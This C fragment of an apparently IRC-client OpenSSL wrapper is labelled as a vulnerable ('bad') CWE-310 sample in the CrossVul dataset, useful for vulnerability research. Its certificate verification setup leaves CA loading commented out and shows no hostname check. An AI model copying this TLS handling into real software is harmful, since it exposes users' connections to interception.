FIXME: Master-Key, Extensions, CA bits
(openssl x509 -text -in servcert.pem)
*/
int
_SSL_get_cert_info (struct cert_info *cert_info, SSL * ssl)
{
X509 *peer_cert;
EVP_PKEY *peer_pkey;
/* EVP_PKEY *ca_pkey; */
/* EVP_PKEY *tmp_pkey; */
char notBefore[64];
char notAfter[64];
int alg;
int sign_alg;
if (!(peer_cert = SSL_get_peer_certificate (ssl)))
return (1); /* FATAL? */
X509_NAME_oneline (X509_get_subject_name (peer_cert), cert_info->subject,
sizeof (cert_info->subject));
X509_NAME_oneline (X509_get_issuer_name (peer_cert), cert_info->issuer,
sizeof (cert_info->issuer));
broke_oneline (cert_info->subject, cert_info->subject_word);
broke_oneline (cert_info->issuer, cert_info->issuer_word);
alg = OBJ_obj2nid (peer_cert->cert_info->key->algor->algorithm);
sign_alg = OBJ_obj2nid (peer_cert->sig_alg->algorithm);
ASN1_TIME_snprintf (notBefore, sizeof (notBefore),
X509_get_notBefore (peer_cert));
ASN1_TIME_snprintf (notAfter, sizeof (notAfter),
X509_get_notAfter (peer_cert));
peer_pkey = X509_get_pubkey (peer_cert);
safe_strcpy (cert_info->algorithm,
(alg == NID_undef) ? "Unknown" : OBJ_nid2ln (alg),
sizeof (cert_info->algorithm));
cert_info->algorithm_bits = EVP_PKEY_bits (peer_pkey);
safe_strcpy (cert_info->sign_algorithm,
(sign_alg == NID_undef) ? "Unknown" : OBJ_nid2ln (sign_alg),
sizeof (cert_info->sign_algorithm));
/* EVP_PKEY_bits(ca_pkey)); */
cert_info->sign_algorithm_bits = 0;
safe_strcpy (cert_info->notbefore, notBefore, sizeof (cert_info->notbefore));
safe_strcpy (cert_info->notafter, notAfter, sizeof (cert_info->notafter));
EVP_PKEY_free (peer_pkey);
/* SSL_SESSION_print_fp(stdout, SSL_get_session(ssl)); */
/*
if (ssl->session->sess_cert->peer_rsa_tmp) {
tmp_pkey = EVP_PKEY_new();
EVP_PKEY_assign_RSA(tmp_pkey, ssl->session->sess_cert->peer_rsa_tmp);
cert_info->rsa_tmp_bits = EVP_PKEY_bits (tmp_pkey);
EVP_PKEY_free(tmp_pkey);
} else
fprintf(stderr, "REMOTE SIDE DOESN'T PROVIDES ->peer_rsa_tmp\n");
*/
cert_info->rsa_tmp_bits = 0;
X509_free (peer_cert);
return (0);
}
struct chiper_info *
_SSL_get_cipher_info (SSL * ssl)
{
const SSL_CIPHER *c;
c = SSL_get_current_cipher (ssl);
safe_strcpy (chiper_info.version, SSL_CIPHER_get_version (c),
sizeof (chiper_info.version));
safe_strcpy (chiper_info.chiper, SSL_CIPHER_get_name (c),
sizeof (chiper_info.chiper));
SSL_CIPHER_get_bits (c, &chiper_info.chiper_bits);
return (&chiper_info);
}
int
_SSL_send (SSL * ssl, char *buf, int len)
{
int num;
num = SSL_write (ssl, buf, len);
switch (SSL_get_error (ssl, num))
{
case SSL_ERROR_SSL: /* setup errno! */
/* ??? */
__SSL_fill_err_buf ("SSL_write");
fprintf (stderr, "%s\n", err_buf);
break;
case SSL_ERROR_SYSCALL:
/* ??? */
perror ("SSL_write/write");
break;
case SSL_ERROR_ZERO_RETURN:
/* fprintf(stderr, "SSL closed on write\n"); */
break;
}
return (num);
}
int
_SSL_recv (SSL * ssl, char *buf, int len)
{
int num;
num = SSL_read (ssl, buf, len);
switch (SSL_get_error (ssl, num))
{
case SSL_ERROR_SSL:
/* ??? */
__SSL_fill_err_buf ("SSL_read");
fprintf (stderr, "%s\n", err_buf);
break;
case SSL_ERROR_SYSCALL:
/* ??? */
if (!would_block ())
perror ("SSL_read/read");
break;
case SSL_ERROR_ZERO_RETURN:
    /* fprintf(stderr, "SSL closed on read\n"); */
break;
}
return (num);
}
SSL *
_SSL_socket (SSL_CTX *ctx, int sd)
{
SSL *ssl;
if (!(ssl = SSL_new (ctx)))
/* FATAL */
__SSL_critical_error ("SSL_new");
SSL_set_fd (ssl, sd);
if (ctx->method == SSLv23_client_method())
SSL_set_connect_state (ssl);
else
SSL_set_accept_state(ssl);
return (ssl);
}
char *
_SSL_set_verify (SSL_CTX *ctx, void *verify_callback, char *cacert)
{
if (!SSL_CTX_set_default_verify_paths (ctx))
{
__SSL_fill_err_buf ("SSL_CTX_set_default_verify_paths");
return (err_buf);
}
/*
if (cacert)
{
if (!SSL_CTX_load_verify_locations (ctx, cacert, NULL))
{
__SSL_fill_err_buf ("SSL_CTX_load_verify_locations");
return (err_buf);
}
}
*/
SSL_CTX_set_verify (ctx, SSL_VERIFY_PEER, verify_callback);
return (NULL);
}
void
_SSL_close (SSL * ssl)
{
SSL_set_shutdown (ssl, SSL_SENT_SHUTDOWN | SSL_RECEIVED_SHUTDOWN);
SSL_free (ssl);
ERR_remove_state (0); /* free state buffer */
}
| ./CrossVul/dataset_final_sorted/CWE-310/c/bad_5867_1 |